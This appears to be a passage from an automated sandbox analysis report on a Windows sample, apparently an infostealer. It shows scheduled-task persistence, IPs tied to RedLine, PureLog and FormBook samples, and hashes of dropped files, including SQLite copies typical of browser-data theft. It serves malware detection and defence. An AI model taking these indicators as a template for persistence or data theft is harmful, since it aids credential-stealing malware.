                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    04:12:07Task SchedulerRun new task: LjGABleGAy path: C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    22:12:00API Interceptor43x Sleep call for process: RgIbrhxoEx.exe modified
                    22:12:06API Interceptor34x Sleep call for process: powershell.exe modified
                    22:12:09API Interceptor41x Sleep call for process: LjGABleGAy.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    ROOTLAYERNETNLLisectAVT_2403002A_369.exeGet hashmaliciousPureLog StealerBrowse
                    • 45.137.22.173
                    LisectAVT_2403002A_70.exeGet hashmaliciousPureLog StealerBrowse
                    • 45.137.22.173
                    fOgI44YEok.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                    • 45.137.22.242
                    WKRej3JIRi.exeGet hashmaliciousRedLineBrowse
                    • 185.222.57.147
                    svEEudloxo.exeGet hashmaliciousRedLineBrowse
                    • 185.222.57.153
                    owKQ0b029a.exeGet hashmaliciousRedLineBrowse
                    • 185.222.57.67
                    8LcFUXH9xN.exeGet hashmaliciousRedLineBrowse
                    • 185.222.57.74
                    0h6tTGKedZ.exeGet hashmaliciousRedLineBrowse
                    • 185.222.57.153
                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtfGet hashmaliciousFormBookBrowse
                    • 45.137.22.78
                    PO2767.xlsGet hashmaliciousFormBookBrowse
                    • 45.137.22.78

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LjGABleGAy.exe.log

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):1216
                    Entropy (8bit):5.34331486778365
                    Encrypted:false
                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                    Malicious:false
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RgIbrhxoEx.exe.log

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):1216
                    Entropy (8bit):5.34331486778365
                    Encrypted:false
                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                    Malicious:true
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):2232
                    Entropy (8bit):5.379401388151058
                    Encrypted:false
                    SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:fLHxvIIwLgZ2KRHWLOug8s
                    MD5:AF15464AFD6EB7D301162A1DC8E01662
                    SHA1:A974B8FEC71BF837B8E72FE43AB43E447FC43A86
                    SHA-256:103A67F6744C098E5121D2D732753DFA4B54FA0EFD918FEC3941A3C052F5E211
                    SHA-512:7B5B7B7F6EAE4544BAF61F9C02BF0138950E5D7D1B0457DE2FAB2C4C484220BDD1AB42D6884838E798AD46CE1B5B5426CEB825A1690B1190857D3B643ABFAB37
                    Malicious:false
                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1doh44bp.5xz.psm1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3cpeqnkc.pbx.psm1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cuqgxjxh.1xj.psm1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_deftesll.lie.ps1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iipxnmmf.ezd.ps1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kz5ccsmr.ge3.psm1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oo1c4ah5.qh4.ps1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wowg51dl.0ls.ps1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\tmp1CC9.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp1CF9.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp1D28.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp2AD0.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp2B00.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp30C0.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp30D1.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp30E1.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp30F2.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp3112.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp3123.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp382E.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp383F.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
